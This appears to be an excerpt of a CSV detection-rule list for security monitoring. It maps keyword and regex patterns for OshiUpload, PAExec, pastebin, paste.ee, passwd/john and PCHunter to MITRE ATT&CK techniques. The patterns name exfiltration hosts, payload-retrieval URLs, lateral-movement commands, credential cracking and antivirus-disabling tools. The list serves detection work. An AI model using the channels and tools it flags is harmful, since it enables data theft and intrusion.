"*/oshi_run.pl*",".{0,1000}\/oshi_run\.pl.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z"
"*/OshiUpload.git*",".{0,1000}\/OshiUpload\.git.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","1","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z"
"*[info] TCP upload server started (tcp.pl)*",".{0,1000}\[info\]\sTCP\supload\sserver\sstarted\s\(tcp\.pl\).{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z"
"*1640fb593deccf72c27363463e6001a1ced831f423b00c8687555115f9365bec*",".{0,1000}1640fb593deccf72c27363463e6001a1ced831f423b00c8687555115f9365bec.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","#filehash","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z"
"*5ety7tpkim5me6eszuwcje7bmy25pbtrjtue7zkqqgziljwqy3rrikqd.onion*",".{0,1000}5ety7tpkim5me6eszuwcje7bmy25pbtrjtue7zkqqgziljwqy3rrikqd\.onion.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","1","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z"
"*ADMIN_BASICAUTH_PASSWORDHASH = f52fbd32b2b3b86ff88ef6c490628285f482af15ddcb29541f94bcf526a3f6c7*",".{0,1000}ADMIN_BASICAUTH_PASSWORDHASH\s\=\sf52fbd32b2b3b86ff88ef6c490628285f482af15ddcb29541f94bcf526a3f6c7.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z"
"*ADMIN_ROUTE = /SuPeRsEcReTuRl/*",".{0,1000}ADMIN_ROUTE\s\=\s\/SuPeRsEcReTuRl\/.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z"
"*https://oshi.at/*",".{0,1000}https\:\/\/oshi\.at\/.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","1","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z"
"*hypnotoad -s webapp.pl && sleep 5*",".{0,1000}hypnotoad\s\-s\swebapp\.pl\s\&\&\ssleep\s5.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z"
"*oshi.at/onion*",".{0,1000}oshi\.at\/onion.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","1","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z"
"*oshiatwowvdbshka.onion*",".{0,1000}oshiatwowvdbshka\.onion.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","1","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z"
"*OshiUpload/app*",".{0,1000}OshiUpload\/app.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z"
"*OshiUpload-master.zip*",".{0,1000}OshiUpload\-master\.zip.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","1","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z"
"*reverse_proxy_tcp.txt*",".{0,1000}reverse_proxy_tcp\.txt.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","0","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z"
"*somenonymous/OshiUpload*",".{0,1000}somenonymous\/OshiUpload.{0,1000}","greyware_tool_keyword","OshiUpload","Ephemeral file sharing engine","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/somenonymous/OshiUpload","1","1","N/A","N/A","10","2","168","24","2022-10-01T04:08:29Z","2019-05-11T02:08:51Z"
"* -csrc C:\\Windows\\notepad.exe -c cmd.exe*",".{0,1000}\s\-csrc\sC\:\\\\Windows\\\\notepad\.exe\s\-c\scmd\.exe.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"* PAExec service*",".{0,1000}\sPAExec\sservice.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*%SYSTEMROOT%\PAExec-*",".{0,1000}\%SYSTEMROOT\%\\PAExec\-.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*/PAExec.cpp*",".{0,1000}\/PAExec\.cpp.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","1","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*/paexec.exe",".{0,1000}\/paexec\.exe","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","1","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*/PAExec.git*",".{0,1000}\/PAExec\.git.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","1","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*/paexec_eula.txt*",".{0,1000}\/paexec_eula\.txt.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*\PAExec.cpp*",".{0,1000}\\PAExec\.cpp.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","1","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*\PAExec.exe*",".{0,1000}\\PAExec\.exe.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*\PAEXEC.EXE-*.pf*",".{0,1000}\\PAEXEC\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*\PAExec.log*",".{0,1000}\\PAExec\.log.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*\paexec.obj*",".{0,1000}\\paexec\.obj.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*\paexec.pdb*",".{0,1000}\\paexec\.pdb.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*\PAExec.sln*",".{0,1000}\\PAExec\.sln.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*\PAExec\*.exe*",".{0,1000}\\PAExec\\.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*\paexec_eula.txt*",".{0,1000}\\paexec_eula\.txt.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*\PAExec_Move*",".{0,1000}\\PAExec_Move.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*\pipe\PAExecErr*",".{0,1000}\\pipe\\PAExecErr.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","#namedpipe","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*\pipe\PAExecIn*",".{0,1000}\\pipe\\PAExecIn.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","#namedpipe","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*\pipe\PAExecOut*",".{0,1000}\\pipe\\PAExecOut.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","#namedpipe","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*2FEB96F5-08E6-48A3-B306-794277650A08*",".{0,1000}2FEB96F5\-08E6\-48A3\-B306\-794277650A08.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","#GUIDproject","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*2FEB96F5-08E6-48A3-B306-794277650A08*",".{0,1000}2FEB96F5\-08E6\-48A3\-B306\-794277650A08.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","#GUIDproject","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*Description'>PAExec Application*",".{0,1000}Description\'\>PAExec\sApplication.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*'Details'>paexec application*",".{0,1000}\'Details\'\>paexec\sapplication.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","registry value","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*HINT: PAExec probably needs to be *",".{0,1000}HINT\:\sPAExec\sprobably\sneeds\sto\sbe\s.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*paexec \\*",".{0,1000}paexec\s\\\\.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*PAExec error waiting for app to exit*",".{0,1000}PAExec\serror\swaiting\sfor\sapp\sto\sexit.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*PAExec service *",".{0,1000}PAExec\sservice\s.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*PAExec starting process*",".{0,1000}PAExec\sstarting\sprocess.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*PAExec timed out waiting for app to exit*",".{0,1000}PAExec\stimed\sout\swaiting\sfor\sapp\sto\sexit.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*paexec.exe \\*",".{0,1000}paexec\.exe\s\\\\.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*PAExec.exe -u *",".{0,1000}PAExec\.exe\s\-u\s.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","0","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*PAExec-master.zip*",".{0,1000}PAExec\-master\.zip.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","1","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*poweradmin.com/PAExec*",".{0,1000}poweradmin\.com\/PAExec.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","1","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*poweradminllc/PAExec*",".{0,1000}poweradminllc\/PAExec.{0,1000}","greyware_tool_keyword","PAExec","PAExec is a freely-redistributable re-implementation of SysInternal/Microsoft's popular PsExec program","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/poweradminllc/PAExec","1","1","N/A","N/A","10","6","527","177","2021-04-15T21:15:34Z","2013-11-13T04:05:27Z"
"*passwd*john*",".{0,1000}passwd.{0,1000}john.{0,1000}","greyware_tool_keyword","passwd","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*paste.ee/d/*",".{0,1000}paste\.ee\/d\/.{0,1000}","greyware_tool_keyword","paste.ee","fetching data from paste.ee","T1041","TA0009","N/A","N/A","Collection","paste.ee","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*paste.ee/paste*",".{0,1000}paste\.ee\/paste.{0,1000}","greyware_tool_keyword","paste.ee","posting data on paste.ee","T1041","TA0010","N/A","N/A","Data Exfiltration","paste.ee","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*pastebin.com*/raw/* ",".{0,1000}pastebin\.com.{0,1000}\/raw\/.{0,1000}\s","greyware_tool_keyword","pastebin","pastebin raw access content - abused by malwares to retrieve payloads","T1119","TA0009","Redline Stealer","N/A","Collection","pastebin.com","1","1","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A"
"*pastebin.com*/rw/*",".{0,1000}pastebin\.com.{0,1000}\/rw\/.{0,1000}","greyware_tool_keyword","pastebin","pastebin raw access content - abused by malwares to retrieve payloads","T1119","TA0009","Redline Stealer","N/A","Collection","pastebin.com","1","1","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A"
"*pastebin.com*api/api_post.php*",".{0,1000}pastebin\.com.{0,1000}api\/api_post\.php.{0,1000}","greyware_tool_keyword","pastebin","pastebin POST url - abused by malwares to exfiltrate informations","T1102 - T1048 - T1094 - T1608.001","TA0011","N/A","N/A","Data Exfiltration","pastebin.com","1","1","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A"
"*/PCHunter.exe*",".{0,1000}\/PCHunter\.exe.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network  and startup configurations. It?s designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*/PCHunter_free.zip*",".{0,1000}\/PCHunter_free\.zip.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network  and startup configurations. It?s designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\PCHunter.sys*",".{0,1000}\\AppData\\Local\\Temp\\PCHunter\.sys.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network  and startup configurations. It?s designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\ControlSet001\Services\PCHunter*",".{0,1000}\\ControlSet001\\Services\\PCHunter.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network  and startup configurations. It?s designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","0","#registry #servicename","N/A","8","10","N/A","N/A","N/A","N/A"
"*\PCHunter.exe*",".{0,1000}\\PCHunter\.exe.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network  and startup configurations. It?s designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\PCHunter_free.zip*",".{0,1000}\\PCHunter_free\.zip.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network  and startup configurations. It?s designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\PCHunter64ar.sys*",".{0,1000}\\PCHunter64ar\.sys.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network  and startup configurations. It?s designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*>Epoolsoft Windows Information View Tools<*",".{0,1000}\>Epoolsoft\sWindows\sInformation\sView\sTools\<.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network  and startup configurations. It?s designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","0","#description","N/A","8","10","N/A","N/A","N/A","N/A"
"*>PC Hunter<*",".{0,1000}\>PC\sHunter\<.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network  and startup configurations. It?s designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","0","#productname","N/A","8","10","N/A","N/A","N/A","N/A"
"*>PCHunter.sys<*",".{0,1000}\>PCHunter\.sys\<.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network  and startup configurations. It?s designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","0","#productname","N/A","8","10","N/A","N/A","N/A","N/A"
"*648eaadf2d81af9ea6792d48740aa3ef4787303f95a0e2abaf23b87b13758eb7*",".{0,1000}648eaadf2d81af9ea6792d48740aa3ef4787303f95a0e2abaf23b87b13758eb7.{0,1000}","greyware_tool_keyword","PCHunter","PCHunter is a toolkit offering deep access to kernel setting - processes - network  and startup configurations. It?s designed to detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Conti - 8BASE - TargetCompany - Hive - Qilin","Defense Evasion","https://www.majorgeeks.com/files/details/pc_hunter.html","1","0","#filehash","N/A","8","10","N/A","N/A","N/A","N/A"
